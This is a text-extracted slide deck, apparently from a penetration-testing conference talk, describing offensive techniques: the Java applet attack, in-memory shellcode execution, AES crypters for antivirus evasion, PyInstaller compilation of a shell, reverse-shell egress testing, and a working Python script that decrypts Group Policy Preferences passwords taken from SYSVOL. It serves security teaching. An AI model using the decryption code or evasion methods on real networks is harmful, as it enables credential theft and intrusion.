Академический Документы
Профессиональный Документы
Культура Документы
Introduc)on
As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.
The purpose of todays talk is to show you my secrets.. Some of my techniques that I use that arent widely known. Why show you? Im an open book on everything I do and sharing is what its all about.
Technique
#1
Java Applet Attack (SET) Well known attack method right? Do you know how it actually works? Do you know the techniques behind it to make it successful?
ZOMG
APT
News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How people found out it was set?
ILIKEHUGS
Method
2
Shellcodeexec
Shellcodeexec method drops a custom compiled and modied version of shellcodeexec by Bernardo Damele. Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. Alphanumeric shellcode is executed in memory and payload is delivered.
DEMO: ShellcodeExec
DEMO: ShellcodeExec
PE Security Evasion
PE
Crypters
One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). Encrypts PE the le using a randomized simple cipher key with AES 128. When executable is run, it brute forces the AES key then decrypts the PE le for you.
DEMO: Hyperion
Hyperion
Encryp)on
Very cool concept and easy to use and write one for yourself. Ability to have a completely unique PE le each time. Slight downfall, stub used for brute force is not polymorphic.
Compiling
Binaries
PyInstaller Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. Works on Linux, OSX, and Windows. python Congure.py python Makespec.py onele noconsole shell.py python Build.py shell/shell.spec cd shell\dist
Bypassing AV
Egress
Bus)ng
Few ways to do it, pre-staged payload for identifying way out. Attempt staged reverse on every port. Metasploit has an ALLPORTS payload as well.
The
AZack
Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID then MACHINE \Preferences\Group. Look for the Groups.xml le.
Contents of File
Python
Code
# code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences from Crypto.Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')
Decrypted Password
Expanding on Group.xml
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com TrustedSec, LLC @TrustedSec